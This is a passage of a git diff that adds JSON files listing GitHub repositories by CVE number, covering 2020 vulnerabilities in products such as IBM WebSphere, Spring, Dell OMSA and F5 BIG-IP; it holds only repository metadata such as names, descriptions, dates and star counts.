"html_url": "https:\/\/github.com\/silentsignal\/WebSphere-WSIF-gadget", + "description": "CVE-2020-4464 \/ CVE-2020-4450", + "fork": false, + "created_at": "2021-08-17T08:44:49Z", + "updated_at": "2024-11-07T14:32:18Z", + "pushed_at": "2021-08-24T15:02:19Z", + "stargazers_count": 32, + "watchers_count": 32, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 32, + "score": 0, + "subscribers_count": 6 + }, + { + "id": 493475207, + "name": "CVE-2020-4464-and-CVE-2020-4450", + "full_name": "yonggui-li\/CVE-2020-4464-and-CVE-2020-4450", + "owner": { + "login": "yonggui-li", + "id": 37830357, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37830357?v=4", + "html_url": "https:\/\/github.com\/yonggui-li", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yonggui-li\/CVE-2020-4464-and-CVE-2020-4450", + "description": null, + "fork": false, + "created_at": "2022-05-18T02:02:51Z", + "updated_at": "2022-08-15T13:19:09Z", + "pushed_at": "2022-08-17T05:12:14Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-5014.json b/2020/CVE-2020-5014.json new file mode 100644 index 0000000000..74dfc68dd5 --- /dev/null +++ b/2020/CVE-2020-5014.json @@ -0,0 +1,37 @@ +[ + { + "id": 305076323, + "name": "datapower-redis-rce-exploit", + "full_name": "copethomas\/datapower-redis-rce-exploit", + "owner": { + "login": "copethomas", + "id": 13124675, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13124675?v=4", + "html_url": "https:\/\/github.com\/copethomas", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/copethomas\/datapower-redis-rce-exploit", + "description": "A POC for IBM Datapower Authenticated Redis RCE Exploit abusing the Test Message Function (CVE-2020-5014)", + "fork": false, + "created_at": "2020-10-18T10:32:32Z", + "updated_at": "2023-02-13T20:03:44Z", + "pushed_at": "2022-05-12T23:29:47Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "datapower", + "exploit", + "ibm" + ], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-5236.json b/2020/CVE-2020-5236.json new file mode 100644 index 0000000000..5a4d0fdf63 --- /dev/null +++ b/2020/CVE-2020-5236.json @@ -0,0 +1,33 @@ +[ + { + "id": 238621679, + "name": "CVE-2020-5236", + "full_name": "motikan2010\/CVE-2020-5236", + "owner": { + "login": "motikan2010", + "id": 3177297, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3177297?v=4", + "html_url": "https:\/\/github.com\/motikan2010", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/motikan2010\/CVE-2020-5236", + "description": "Waitress 1.4.2 ReDoS - CVE-2020-5236 (Blog Sample Code)", + "fork": false, + "created_at": "2020-02-06T06:21:02Z", + "updated_at": "2024-08-12T19:57:24Z", + "pushed_at": "2020-02-06T09:45:23Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-5245.json b/2020/CVE-2020-5245.json new file mode 100644 index 0000000000..08df67067e --- /dev/null +++ b/2020/CVE-2020-5245.json @@ -0,0 +1,33 @@ +[ + { + "id": 602954265, + "name": "CVE-2020-5245", + "full_name": "LycsHub\/CVE-2020-5245", + "owner": { + "login": "LycsHub", + "id": 44913383, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44913383?v=4", + "html_url": "https:\/\/github.com\/LycsHub", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/LycsHub\/CVE-2020-5245", + "description": null, + "fork": false, + "created_at": "2023-02-17T09:55:45Z", + "updated_at": "2023-02-17T09:58:26Z", + "pushed_at": "2023-02-17T09:58:21Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-5248.json b/2020/CVE-2020-5248.json new file mode 100644 index 0000000000..83f8cd0215 --- /dev/null +++ b/2020/CVE-2020-5248.json @@ -0,0 +1,64 @@ +[ + { + "id": 302635416, + "name": "CVE-2020-5248", + "full_name": "indevi0us\/CVE-2020-5248", + "owner": { + "login": "indevi0us", + "id": 72605728, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72605728?v=4", + "html_url": "https:\/\/github.com\/indevi0us", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/indevi0us\/CVE-2020-5248", + "description": "Proof of Concept (PoC) for CVE-2020-5248.", + "fork": false, + "created_at": "2020-10-09T12:31:19Z", + "updated_at": "2024-02-09T21:18:08Z", + "pushed_at": "2022-12-14T20:05:35Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 390551926, + "name": "CVE-2020-5248", + "full_name": "Mkway\/CVE-2020-5248", + "owner": { + "login": "Mkway", + "id": 34364080, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34364080?v=4", + "html_url": "https:\/\/github.com\/Mkway", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Mkway\/CVE-2020-5248", + "description": "CVE-2020-5248", + "fork": false, + "created_at": "2021-07-29T00:46:26Z", + "updated_at": "2021-07-29T04:13:11Z", + "pushed_at": "2021-07-29T04:13:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-5250.json b/2020/CVE-2020-5250.json new file mode 100644 index 0000000000..ad368d8aee --- /dev/null +++ b/2020/CVE-2020-5250.json @@ -0,0 +1,33 @@ +[ + { + "id": 246657341, + "name": "lblfixer_cve2020_5250", + "full_name": "drkbcn\/lblfixer_cve2020_5250", + "owner": { + "login": "drkbcn", + "id": 2090227, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2090227?v=4", + "html_url": "https:\/\/github.com\/drkbcn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/drkbcn\/lblfixer_cve2020_5250", + "description": "Labelgrup Fixer for CVE-2020-5250 vulnerability", + "fork": false, + "created_at": "2020-03-11T19:04:14Z", + "updated_at": "2024-08-12T19:58:38Z", + "pushed_at": "2020-03-21T10:29:53Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-5254.json b/2020/CVE-2020-5254.json new file mode 100644 index 0000000000..67e5cff244 --- /dev/null +++ b/2020/CVE-2020-5254.json @@ -0,0 +1,33 @@ +[ + { + "id": 246165139, + "name": "CVE-2020-5254", + "full_name": "dpmdpm2\/CVE-2020-5254", + "owner": { + "login": "dpmdpm2", + "id": 60997239, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60997239?v=4", + "html_url": "https:\/\/github.com\/dpmdpm2", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dpmdpm2\/CVE-2020-5254", + "description": null, + "fork": false, + "created_at": "2020-03-09T23:40:36Z", + "updated_at": "2024-08-12T19:58:33Z", + "pushed_at": "2020-03-09T23:42:00Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-5260.json b/2020/CVE-2020-5260.json new file mode 100644 index 0000000000..ec93eec95f --- /dev/null +++ b/2020/CVE-2020-5260.json @@ -0,0 +1,95 @@ +[ + { + "id": 255880212, + "name": "cve-2020-5260", + "full_name": "brompwnie\/cve-2020-5260", + "owner": { + "login": "brompwnie", + "id": 8638589, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8638589?v=4", + "html_url": "https:\/\/github.com\/brompwnie", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/brompwnie\/cve-2020-5260", + "description": "A HTTP PoC Endpoint for cve-2020-5260 which can be deployed to Heroku", + "fork": false, + "created_at": "2020-04-15T10:16:56Z", + "updated_at": "2024-08-12T20:00:12Z", + "pushed_at": "2020-04-16T09:47:38Z", + "stargazers_count": 37, + "watchers_count": 37, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 37, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 255896500, + "name": "CVE-2020-5260", + "full_name": "Asgavar\/CVE-2020-5260", + "owner": { + "login": "Asgavar", + "id": 18126670, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18126670?v=4", + "html_url": "https:\/\/github.com\/Asgavar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Asgavar\/CVE-2020-5260", + "description": "https:\/\/bugs.chromium.org\/p\/project-zero\/issues\/detail?id=2021", + "fork": false, + "created_at": "2020-04-15T11:32:16Z", + "updated_at": "2024-08-12T20:00:13Z", + "pushed_at": "2020-04-15T11:57:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 256267905, + "name": "CVE-2020-5260", + "full_name": "sv3nbeast\/CVE-2020-5260", + "owner": { + "login": "sv3nbeast", + "id": 55974091, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55974091?v=4", + "html_url": "https:\/\/github.com\/sv3nbeast", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sv3nbeast\/CVE-2020-5260", + "description": "CVE-2020-5260演示记录", + "fork": false, + "created_at": "2020-04-16T16:19:23Z", + "updated_at": "2024-08-12T20:00:16Z", + "pushed_at": "2020-04-16T17:01:02Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 11, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-5267.json b/2020/CVE-2020-5267.json new file mode 100644 index 0000000000..4cc40f9f69 --- /dev/null +++ b/2020/CVE-2020-5267.json @@ -0,0 +1,33 @@ +[ + { + "id": 249481499, + "name": "legacy-rails-CVE-2020-5267-patch", + "full_name": "GUI\/legacy-rails-CVE-2020-5267-patch", + "owner": { + "login": "GUI", + "id": 12112, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12112?v=4", + "html_url": "https:\/\/github.com\/GUI", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/GUI\/legacy-rails-CVE-2020-5267-patch", + "description": "Patch CVE-2020-5267 for Rails 4 and Rails 3", + "fork": false, + "created_at": "2020-03-23T16:16:39Z", + "updated_at": "2024-08-12T19:59:10Z", + "pushed_at": "2022-12-14T10:29:41Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-5377.json b/2020/CVE-2020-5377.json new file mode 100644 index 0000000000..04cb6877aa --- /dev/null +++ b/2020/CVE-2020-5377.json @@ -0,0 +1,64 @@ +[ + { + "id": 572725685, + "name": "AFR-in-OMSA", + "full_name": "und3sc0n0c1d0\/AFR-in-OMSA", + "owner": { + "login": "und3sc0n0c1d0", + "id": 32236059, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32236059?v=4", + "html_url": "https:\/\/github.com\/und3sc0n0c1d0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/und3sc0n0c1d0\/AFR-in-OMSA", + "description": "Validation of Arbitrary File Read Vulnerabilities in Dell OpenManage Server Administrator (OMSA) - CVE-2016-4004, CVE-2021-21514 and CVE-2020-5377.", + "fork": false, + "created_at": "2022-11-30T22:34:58Z", + "updated_at": "2024-05-21T19:14:18Z", + "pushed_at": "2022-12-01T06:36:26Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 807731524, + "name": "CVE-2020-5377", + "full_name": "n3rdh4x0r\/CVE-2020-5377", + "owner": { + "login": "n3rdh4x0r", + "id": 66146701, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66146701?v=4", + "html_url": "https:\/\/github.com\/n3rdh4x0r", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/n3rdh4x0r\/CVE-2020-5377", + "description": "CVE-2020-5377: Dell OpenManage Server Administrator File Read", + "fork": false, + "created_at": "2024-05-29T17:01:16Z", + "updated_at": "2024-11-18T18:55:16Z", + "pushed_at": "2024-11-18T18:55:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-5398.json b/2020/CVE-2020-5398.json new file mode 100644 index 0000000000..7aeaf651f4 --- /dev/null +++ b/2020/CVE-2020-5398.json @@ -0,0 +1,33 @@ +[ + { + "id": 234478120, + "name": "CVE-2020-5398", + "full_name": "motikan2010\/CVE-2020-5398", + "owner": { + "login": "motikan2010", + "id": 3177297, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3177297?v=4", + "html_url": "https:\/\/github.com\/motikan2010", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/motikan2010\/CVE-2020-5398", + "description": "CVE-2020-5398 - RFD(Reflected File Download) Attack for Spring MVC", + "fork": false, + "created_at": "2020-01-17T05:35:01Z", + "updated_at": "2024-09-09T06:55:57Z", + "pushed_at": "2022-12-15T07:33:15Z", + "stargazers_count": 84, + "watchers_count": 84, + "has_discussions": false, + "forks_count": 18, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 18, + "watchers": 84, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-5410.json b/2020/CVE-2020-5410.json new file mode 100644 index 0000000000..1f12c0fe98 --- /dev/null +++ b/2020/CVE-2020-5410.json @@ -0,0 +1,64 @@ +[ + { + "id": 268974025, + "name": "config-demo", + "full_name": "dead5nd\/config-demo", + "owner": { + "login": "dead5nd", + "id": 29460919, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29460919?v=4", + "html_url": "https:\/\/github.com\/dead5nd", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dead5nd\/config-demo", + "description": "CVE-2020-5410", + "fork": false, + "created_at": "2020-06-03T02:52:09Z", + "updated_at": "2020-06-03T02:58:48Z", + "pushed_at": "2020-06-03T02:58:45Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 272803463, + "name": "CVE-2020-5410-POC", + "full_name": "osamahamad\/CVE-2020-5410-POC", + "owner": { + "login": "osamahamad", + "id": 59566963, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59566963?v=4", + "html_url": "https:\/\/github.com\/osamahamad", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/osamahamad\/CVE-2020-5410-POC", + "description": "CVE-2020-5410 Spring Cloud Config directory traversal vulnerability", + "fork": false, + "created_at": "2020-06-16T20:15:58Z", + "updated_at": "2024-08-12T20:02:43Z", + "pushed_at": "2020-06-16T20:38:41Z", + "stargazers_count": 31, + "watchers_count": 31, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 31, + "score": 0, + "subscribers_count": 4 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-5421.json b/2020/CVE-2020-5421.json new file mode 100644 index 0000000000..14977e62b0 --- /dev/null +++ b/2020/CVE-2020-5421.json @@ -0,0 +1,33 @@ +[ + { + "id": 328377392, + "name": "CVE-2020-5421", + "full_name": "pandaMingx\/CVE-2020-5421", + "owner": { + "login": "pandaMingx", + "id": 45414475, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45414475?v=4", + "html_url": "https:\/\/github.com\/pandaMingx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pandaMingx\/CVE-2020-5421", + "description": "Spring 安全漏洞 CVE-2020-5421复现 ", + "fork": false, + "created_at": "2021-01-10T12:26:00Z", + "updated_at": "2023-05-31T03:49:05Z", + "pushed_at": "2021-01-10T12:48:19Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-5504.json b/2020/CVE-2020-5504.json new file mode 100644 index 0000000000..83ffa77e4c --- /dev/null +++ b/2020/CVE-2020-5504.json @@ -0,0 +1,33 @@ +[ + { + "id": 427957296, + "name": "CVE-2020-5504-phpMyAdmin", + "full_name": "xMohamed0\/CVE-2020-5504-phpMyAdmin", + "owner": { + "login": "xMohamed0", + "id": 94008154, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/94008154?v=4", + "html_url": "https:\/\/github.com\/xMohamed0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xMohamed0\/CVE-2020-5504-phpMyAdmin", + "description": null, + "fork": false, + "created_at": "2021-11-14T14:54:04Z", + "updated_at": "2023-08-28T12:43:02Z", + "pushed_at": "2021-11-14T14:54:40Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-5752.json b/2020/CVE-2020-5752.json new file mode 100644 index 0000000000..2c5e55a875 --- /dev/null +++ b/2020/CVE-2020-5752.json @@ -0,0 +1,33 @@ +[ + { + "id": 430312335, + "name": "CVE-2020-5752-Druva-inSync-Windows-Client-6.6.3---Local-Privilege-Escalation-PowerShell-", + "full_name": "yevh\/CVE-2020-5752-Druva-inSync-Windows-Client-6.6.3---Local-Privilege-Escalation-PowerShell-", + "owner": { + "login": "yevh", + "id": 14802765, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14802765?v=4", + "html_url": "https:\/\/github.com\/yevh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yevh\/CVE-2020-5752-Druva-inSync-Windows-Client-6.6.3---Local-Privilege-Escalation-PowerShell-", + "description": "Druva inSync Windows Client 6.6.3 - Local Privilege Escalation (PowerShell) RCE", + "fork": false, + "created_at": "2021-11-21T08:30:24Z", + "updated_at": "2022-12-03T11:45:49Z", + "pushed_at": "2022-12-03T11:45:32Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-5837.json b/2020/CVE-2020-5837.json new file mode 100644 index 0000000000..ff950f0aeb --- /dev/null +++ b/2020/CVE-2020-5837.json @@ -0,0 +1,33 @@ +[ + { + "id": 256151753, + "name": "SEP-14.2-Arbitrary-Write", + "full_name": "RedyOpsResearchLabs\/SEP-14.2-Arbitrary-Write", + "owner": { + "login": "RedyOpsResearchLabs", + "id": 63094523, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63094523?v=4", + "html_url": "https:\/\/github.com\/RedyOpsResearchLabs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RedyOpsResearchLabs\/SEP-14.2-Arbitrary-Write", + "description": "CVE-2020-5837 exploit", + "fork": false, + "created_at": "2020-04-16T08:15:18Z", + "updated_at": "2024-10-29T16:57:14Z", + "pushed_at": "2020-05-13T09:45:12Z", + "stargazers_count": 41, + "watchers_count": 41, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 12, + "watchers": 41, + "score": 0, + "subscribers_count": 4 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-5839.json b/2020/CVE-2020-5839.json new file mode 100644 index 0000000000..27d58bcb22 --- /dev/null +++ b/2020/CVE-2020-5839.json @@ -0,0 +1,33 @@ +[ + { + "id": 354341629, + "name": "CVE-2020-5839", + "full_name": "nasbench\/CVE-2020-5839", + "owner": { + "login": "nasbench", + "id": 8741929, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8741929?v=4", + "html_url": "https:\/\/github.com\/nasbench", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nasbench\/CVE-2020-5839", + "description": "CVE-2020-5839 POC", + "fork": false, + "created_at": "2021-04-03T16:35:38Z", + "updated_at": "2021-07-04T20:31:17Z", + "pushed_at": "2021-04-03T16:40:13Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-5842.json b/2020/CVE-2020-5842.json new file mode 100644 index 0000000000..46d89f869a --- /dev/null +++ b/2020/CVE-2020-5842.json @@ -0,0 +1,33 @@ +[ + { + "id": 457327392, + "name": "codoforum", + "full_name": "prasanthc41m\/codoforum", + "owner": { + "login": "prasanthc41m", + "id": 58906808, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58906808?v=4", + "html_url": "https:\/\/github.com\/prasanthc41m", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/prasanthc41m\/codoforum", + "description": "CVE-2020-5842 Stored XSS Vulnerability in Codoforum 4.8.3", + "fork": false, + "created_at": "2022-02-09T11:20:16Z", + "updated_at": "2023-07-19T18:26:03Z", + "pushed_at": "2023-07-24T06:08:30Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-5844.json b/2020/CVE-2020-5844.json new file mode 100644 index 0000000000..9ccffc88f5 --- /dev/null +++ b/2020/CVE-2020-5844.json @@ -0,0 +1,77 @@ +[ + { + "id": 237100867, + "name": "CVE-2020-5844", + "full_name": "TheCyberGeek\/CVE-2020-5844", + "owner": { + "login": "TheCyberGeek", + "id": 52138157, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52138157?v=4", + "html_url": "https:\/\/github.com\/TheCyberGeek", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TheCyberGeek\/CVE-2020-5844", + "description": null, + "fork": false, + "created_at": "2020-01-29T23:11:46Z", + "updated_at": "2024-08-12T19:57:10Z", + "pushed_at": "2021-02-09T23:22:32Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 6, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 494251639, + "name": "exploit-CVE-2020-5844", + "full_name": "UNICORDev\/exploit-CVE-2020-5844", + "owner": { + "login": "UNICORDev", + "id": 103281826, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/103281826?v=4", + "html_url": "https:\/\/github.com\/UNICORDev", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/UNICORDev\/exploit-CVE-2020-5844", + "description": "Exploit for CVE-2020-5844 (Pandora FMS v7.0NG.742) - Remote Code Execution", + "fork": false, + "created_at": "2022-05-19T22:50:44Z", + "updated_at": "2024-07-14T19:47:08Z", + "pushed_at": "2024-02-17T17:50:35Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2020-5844", + "exploit", + "hackthebox", + "linux", + "pandora", + "penetration-testing", + "proof-of-concept", + "python", + "remote-code-execution", + "unicord", + "vulnerability" + ], + "visibility": "public", + "forks": 1, + "watchers": 8, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-5902.json b/2020/CVE-2020-5902.json new file mode 100644 index 0000000000..bf6f859652 --- /dev/null +++ b/2020/CVE-2020-5902.json @@ -0,0 +1,1775 @@ +[ + { + "id": 277122836, + "name": "CVE-2020-5902", + "full_name": "dwisiswant0\/CVE-2020-5902", + "owner": { + "login": "dwisiswant0", + "id": 25837540, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25837540?v=4", + "html_url": "https:\/\/github.com\/dwisiswant0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dwisiswant0\/CVE-2020-5902", + "description": "CVE-2020-5902", + "fork": false, + "created_at": "2020-07-04T14:12:57Z", + "updated_at": "2024-08-12T20:03:21Z", + "pushed_at": "2020-07-04T14:21:27Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 9, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 277243283, + "name": "CVE-2020-5902-Scanner", + "full_name": "aqhmal\/CVE-2020-5902-Scanner", + "owner": { + "login": "aqhmal", + "id": 22043590, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22043590?v=4", + "html_url": "https:\/\/github.com\/aqhmal", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/aqhmal\/CVE-2020-5902-Scanner", + "description": "Automated script for F5 BIG-IP scanner (CVE-2020-5902) using hosts retrieved from Shodan API.", + "fork": false, + "created_at": "2020-07-05T06:19:09Z", + "updated_at": "2024-08-12T20:03:23Z", + "pushed_at": "2022-12-08T11:03:15Z", + "stargazers_count": 55, + "watchers_count": 55, + "has_discussions": false, + "forks_count": 22, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "bigip", + "f5-bigip", + "f5networks", + "python3", + "shodan-python" + ], + "visibility": "public", + "forks": 22, + "watchers": 55, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 277342661, + "name": "CVE-2020-5902", + "full_name": "jas502n\/CVE-2020-5902", + "owner": { + "login": "jas502n", + "id": 16593068, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16593068?v=4", + "html_url": "https:\/\/github.com\/jas502n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jas502n\/CVE-2020-5902", + "description": "CVE-2020-5902 BIG-IP", + "fork": false, + "created_at": "2020-07-05T16:38:32Z", + "updated_at": "2024-08-12T20:03:24Z", + "pushed_at": "2021-10-13T07:53:46Z", + "stargazers_count": 372, + "watchers_count": 372, + "has_discussions": false, + "forks_count": 112, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 112, + "watchers": 372, + "score": 0, + "subscribers_count": 9 + }, + { + "id": 277342677, + "name": "CVE-2020-5902", + "full_name": "ar0dd\/CVE-2020-5902", + "owner": { + "login": "ar0dd", + "id": 42455358, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42455358?v=4", + "html_url": 